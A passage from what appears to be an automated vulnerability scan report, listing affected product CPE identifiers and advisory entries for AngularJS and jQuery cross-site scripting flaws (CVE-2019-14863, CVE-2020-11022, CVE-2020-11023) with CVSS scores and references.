cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_profitability_management:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_profitability_management:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_de_nederlandsche_bank:8.0.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_european_banking_authority:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_european_banking_authority:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_us_federal_reserve:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_retail_customer_analytics:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.6 cpe:2.3:a:oracle:financial_services_retail_performance_analytics:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_retail_performance_analytics:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_revenue_management_and_billing:2.4.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_revenue_management_and_billing:2.4.0.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.2.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.3.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.3.2:*:*:*:*:*:*:* 
cpe:2.3:a:oracle:healthcare_translational_research:3.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_guest_access:4.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_guest_access:4.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_materials_control:18.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_simphony:*:*:*:*:*:*:*:* versions from (including) 19.1.0; versions up to (including) 19.1.2 cpe:2.3:a:oracle:hospitality_simphony:18.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_simphony:18.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:identity_manager:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_accounting_analyzer:8.0.9:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_data_foundation:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:insurance_ifrs_17_analyzer:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_ifrs_17_analyzer:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:*:*:*:*:*:*:*:* versions from (including) 5.0.0.0; versions up to (including) 5.6.0.0 cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.6.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_performance_insight:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper_and_adf:11.1.1.9.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper_and_adf:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper_and_adf:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:knowledge:*:*:*:*:*:*:*:* versions from (including) 8.6.0; versions up to (including) 8.6.3 cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.55:*:*:*:*:*:*:* 
cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.58:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation:*:*:*:*:*:*:*:* versions from (including) 12.2.0; versions up to (including) 12.2.15 cpe:2.3:a:oracle:policy_automation:10.4.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation:12.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation:12.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation_connector_for_siebel:10.4.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation_for_mobile_devices:*:*:*:*:*:*:*:* versions from (including) 12.2.0; versions up to (including) 12.2.15 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 16.2.0; versions up to (including) 16.2.11 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 17.12.0; versions up to (including) 17.12.7 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 18.8.0; versions up to (including) 18.8.9 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 19.12.0; versions up to (including) 19.12.4 cpe:2.3:a:oracle:primavera_gateway:15.2.18:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:* versions from (including) 17.7; versions up to (including) 17.12 cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:real-time_scheduler:*:*:*:*:*:*:*:* versions from (including) 2.3.0.1; versions up to (including) 2.3.0.3 cpe:2.3:a:oracle:rest_data_services:11.2.0.4:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:12.1.0.2:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:12.2.0.1:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:18c:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:19c:*:*:*:-:*:*:* cpe:2.3:a:oracle:retail_back_office:14.0:*:*:*:*:*:*:* 
cpe:2.3:a:oracle:retail_back_office:14.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_central_office:14.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_central_office:14.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_insights:15.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_insights:16.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:18.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:19.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_point-of-service:14.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_point-of-service:14.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_returns_management:14.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_returns_management:14.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:service_bus:11.1.1.9.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:service_bus:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:service_bus:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:siebel_mobile_applications:*:*:*:*:*:*:*:* versions up to (including) 19.8 cpe:2.3:a:oracle:siebel_ui_framework:20.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:storagetek_tape_analytics_sw_tool:2.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:system_utilities:19.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:tape_library_acsls:8.5:*:*:*:*:*:*:* cpe:2.3:a:oracle:tape_library_acsls:8.5.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:transportation_management:1.4.3:*:*:*:*:*:*:* cpe:2.3:a:oracle:utilities_mobile_workforce_management:*:*:*:*:*:*:*:* versions from (including) 2.3.0.1; versions up to (including) 2.3.0.3 cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:* cpe:2.3:a:redhat:cloudforms:4.7:*:*:*:*:*:*:* cpe:2.3:a:redhat:virtualization_manager:4.3:*:*:*:*:*:*:*
CVE-2019-14863
There is a vulnerability in all angular versions before 1.5.0-beta.0, where after escaping the context of the web application, the web application delivers data to its users along with other trusted dynamic content, without validating it.
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
References:
Vulnerable Software & Versions (NVD):
cpe:2.3:a:angularjs:angular.js:*:*:*:*:*:*:*:* versions from (including) 1.0.0; versions up to (including) 1.4.14 cpe:2.3:a:redhat:decision_manager:7.0:*:*:*:*:*:*:* cpe:2.3:a:redhat:process_automation:7.0:*:*:*:*:*:*:*
CVE-2020-11022
In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
References:
info - https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/
Vulnerable Software & Versions (NVD):
cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 7.0; versions up to (excluding) 7.70 cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 8.7.0; versions up to (excluding) 8.7.14 cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 8.8.0; versions up to (excluding) 8.8.6 cpe:2.3:a:jquery:jquery:*:*:*:*:*:*:*:* versions from (including) 1.2; versions up to (excluding) 3.5.0 cpe:2.3:a:netapp:max_data:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:oncommand_insight:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:oncommand_system_manager:*:*:*:*:*:*:*:* versions from (including) 3.0; versions up to (including) 3.1.3 cpe:2.3:a:netapp:snap_creator_framework:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_supplier_collaboration_for_process:6.2.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:*:*:*:*:*:*:*:* versions from (including) 18.1; versions up to (including) 20.1 cpe:2.3:a:oracle:banking_digital_experience:18.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:18.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:18.3:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:19.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:19.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:20.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:blockchain_platform:*:*:*:*:*:*:*:* versions up to (excluding) 21.1.2 cpe:2.3:a:oracle:communications_application_session_controller:3.8m0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5.0.23.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0.0.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_diameter_signaling_router_idih\::*:*:*:*:*:*:*:* versions from (including) 8.0.0; versions up to (including) 8.2.2 
cpe:2.3:a:oracle:communications_eagle_application_processor:*:*:*:*:*:*:*:* versions from (including) 16.1.0; versions up to (including) 16.4.0 cpe:2.3:a:oracle:communications_services_gatekeeper:7.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_webrtc_session_controller:7.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_manager_ops_center:12.4.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_session_border_controller:8.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.1.0 cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:* versions from (including) 8.0.6.0.0; versions up to (including) 8.1.0.0.0 cpe:2.3:a:oracle:financial_services_analytical_applications_reconciliation_framework:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.8 cpe:2.3:a:oracle:financial_services_analytical_applications_reconciliation_framework:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_asset_liability_management:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_asset_liability_management:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_asset_liability_management:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_balance_sheet_planning:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_basic:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.8 cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_basic:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_internal_ratings_based_approach:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.8 cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_internal_ratings_based_approach:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_data_foundation:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to 
(including) 8.1.0 cpe:2.3:a:oracle:financial_services_data_governance_for_us_regulatory_reporting:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.9 cpe:2.3:a:oracle:financial_services_data_integration_hub:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_data_integration_hub:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_data_integration_hub:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.8 cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.8 cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:* 
cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_profitability_management:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_profitability_management:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_profitability_management:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_european_banking_authority:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.1.0 cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_us_federal_reserve:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.9 cpe:2.3:a:oracle:healthcare_foundation:7.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_materials_control:18.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_simphony:*:*:*:*:*:*:*:* versions from (including) 19.1.0; versions up to (including) 19.1.2 cpe:2.3:a:oracle:hospitality_simphony:18.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_simphony:18.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_simphony:19.1.0-19.1.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_accounting_analyzer:8.0.9:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_data_foundation:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.1.0 cpe:2.3:a:oracle:insurance_data_foundation:8.0.6-8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:*:*:*:*:*:*:*:* versions from (including) 5.0.0.0; versions up to (including) 5.6.0.0 
cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.6.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.58:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation:*:*:*:*:*:*:*:* versions from (including) 12.2.0; versions up to (including) 12.2.20 cpe:2.3:a:oracle:policy_automation_connector_for_siebel:10.4.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation_for_mobile_devices:*:*:*:*:*:*:*:* versions from (including) 12.2.0; versions up to (including) 12.2.20 cpe:2.3:a:oracle:retail_back_office:14.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_back_office:14.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:19.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_returns_management:14.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_returns_management:14.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:siebel_ui_framework:20.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:storagetek_acsls:8.5.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:* cpe:2.3:a:tenable:log_correlation_engine:*:*:*:*:*:*:*:* versions up to (excluding) 6.0.9
CVE-2020-11023
CISA Known Exploited Vulnerability:
Product: JQuery JQuery
Name: JQuery Cross-Site Scripting (XSS) Vulnerability
Date Added: 2025-01-23
Description: JQuery contains a persistent cross-site scripting (XSS) vulnerability. When passing maliciously formed, untrusted input enclosed in HTML tags, JQuery's DOM manipulators can execute untrusted code in the context of the user's browser.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Due Date: 2025-02-13
Notes: https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/ ; https://nvd.nist.gov/vuln/detail/CVE-2020-11023
In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing <option> elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
References:
info - https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/
Vulnerable Software & Versions (NVD):
cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 7.0; versions up to (excluding) 7.70 cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 8.7.0; versions up to (excluding) 8.7.14 cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 8.8.0; versions up to (excluding) 8.8.6 cpe:2.3:a:jquery:jquery:*:*:*:*:*:*:*:* versions from (including) 1.0.3; versions up to (excluding) 3.5.0 cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:linux:*:* cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vsphere:*:* cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:windows:*:* cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:cloud_insights_storage_workload_security_agent:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:hci_baseboard_management_controller:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:max_data:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:oncommand_insight:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:oncommand_system_manager:*:*:*:*:*:*:*:* versions from (including) 3.0; versions up to (including) 3.1.3 cpe:2.3:a:netapp:snap_creator_framework:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:snapcenter_server:-:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_express:*:*:*:*:*:*:*:* versions up to (excluding) 20.2 cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_enterprise_collections:*:*:*:*:*:*:*:* versions from (including) 2.7.0; versions up to (including) 2.8.0 cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:* versions from (including) 2.4.0; versions up to (including) 2.10.0 cpe:2.3:a:oracle:blockchain_platform:*:*:*:*:*:*:*:* versions up to (excluding) 21.1.2 cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:business_intelligence:5.9.0.0.0:*:*:*:enterprise:*:*:* cpe:2.3:a:oracle:communications_analytics:12.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_eagle_application_processor:*:*:*:*:*:*:*:* versions from (including) 16.1.0; versions up to (including) 16.4.0 
cpe:2.3:a:oracle:communications_element_manager:8.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_element_manager:8.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_element_manager:8.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_interactive_session_recorder:*:*:*:*:*:*:*:* versions from (including) 6.1; versions up to (including) 6.4 cpe:2.3:a:oracle:communications_operations_monitor:*:*:*:*:*:*:*:* versions from (including) 4.1; versions up to (including) 4.3 cpe:2.3:a:oracle:communications_operations_monitor:3.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_services_gatekeeper:7.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_report_manager:8.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_report_manager:8.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_report_manager:8.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_route_manager:8.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_route_manager:8.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_route_manager:8.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_de_nederlandsche_bank:8.0.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:health_sciences_inform:6.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.3.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.3.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:hyperion_financial_reporting:11.1.2.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:jd_edwards_enterpriseone_orchestrator:*:*:*:*:*:*:*:* versions up to (excluding) 9.2.5.0 cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:* versions up to (excluding) 9.2.5.0 
cpe:2.3:a:oracle:oss_support_tools:*:*:*:*:*:*:*:* versions up to (excluding) 2.12.41 cpe:2.3:a:oracle:peoplesoft_enterprise_human_capital_management_resources:9.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 16.2; versions up to (including) 16.2.11 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 17.12.0; versions up to (including) 17.12.7 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 18.8.0; versions up to (including) 18.8.9 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 19.12.0; versions up to (including) 19.12.4 cpe:2.3:a:oracle:rest_data_services:11.2.0.4:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:12.1.0.2:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:12.2.0.1:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:18c:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:19c:*:*:*:-:*:*:* cpe:2.3:a:oracle:siebel_mobile:*:*:*:*:*:*:*:* versions up to (including) 20.12 cpe:2.3:a:oracle:storagetek_acsls:8.5.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:storagetek_tape_analytics_sw_tool:2.3.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:webcenter_sites:12.2.1.4.0:*:*:*:*:*:*:* 